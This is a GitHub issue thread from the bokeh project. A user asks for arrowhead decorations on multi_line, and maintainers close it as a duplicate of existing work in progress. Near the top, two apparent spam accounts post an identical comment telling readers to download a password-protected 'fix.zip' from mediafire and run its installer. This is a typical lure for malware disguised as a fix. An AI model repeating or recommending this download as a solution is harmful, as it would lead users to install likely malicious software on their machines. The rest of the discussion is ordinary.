### ISSUE TITLE
[FEATURE] Adding decoration to MultiLine

### ISSUE THREAD

**Issue by PrateekArya** [bokeh/bokeh#14041] opened 2024-08-26 12:36 UTC
### Problem description

Creating this request as a follow up from this discourse: [link](https://discourse.bokeh.org/t/adding-decoration-to-multiline/11772?u=prateekarya)

I am trying to add decorations to `multi_line`, specifically arrowheads. Here is the code snippet:

```
from bokeh.models import VeeHead
ml = p.multi_line(xs='xs', ys='ys', color='black', source=dataSource)
ml.add_decoration(VeeHead(size=10), "end")
```

The code does not throw any exceptions, but it does not draw arrowheads. So, I am guessing the functionality exists but it's not implemented yet.

### Feature description

Enable decorating `multi_line` with Vee and Tee heads.

### Potential alternatives

Use more `multi_line` to draw these decoations.

**Comment by Lxx-c** [comment] 2024-08-26 12:36
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by abdulhkeemGit** [comment] 2024-08-26 12:37
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by PrateekArya** [comment] 2024-08-26 12:40
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

Is this a spam!? or are you serious? Will it allow me to draw arrowheads?

**Comment by bryevdv** [comment] 2024-08-26 16:42
It looks like this is part of https://github.com/bokeh/bokeh/pull/13619 (I was not aware existing WIP already considered `multi_line`). 

@mattpap is there anything captured here that is not already part of your plans? If not, we can close

**Comment by bryevdv** [comment] 2024-09-06 16:47
I'm going to go ahead and close this as a duplicate of #8129 / #13619

**Closed as completed by bryevdv** 2024-09-06 16:47 UTC
Labels: reso: duplicate, type: discussion

**Comment by mattpap** [comment] 2024-09-06 17:49
> Is there anything captured here that is not already part of your plans? If not, we can close.

Sorry, missed this. Yes it's all covered by the existing issue and work in progress in the PR.

**Comment by PrateekArya** [comment] 2024-09-10 06:26
> > Is there anything captured here that is not already part of your plans? If not, we can close.
> 
> Sorry, missed this. Yes it's all covered by the existing issue and work in progress in the PR.

So, what's the timeline for release to end users?

**Comment by mattpap** [comment] 2024-09-10 07:46
> So, what's the timeline for release to end users?

There is no timeline for this. When this is completed depends primarily on me having time available to finish this work.
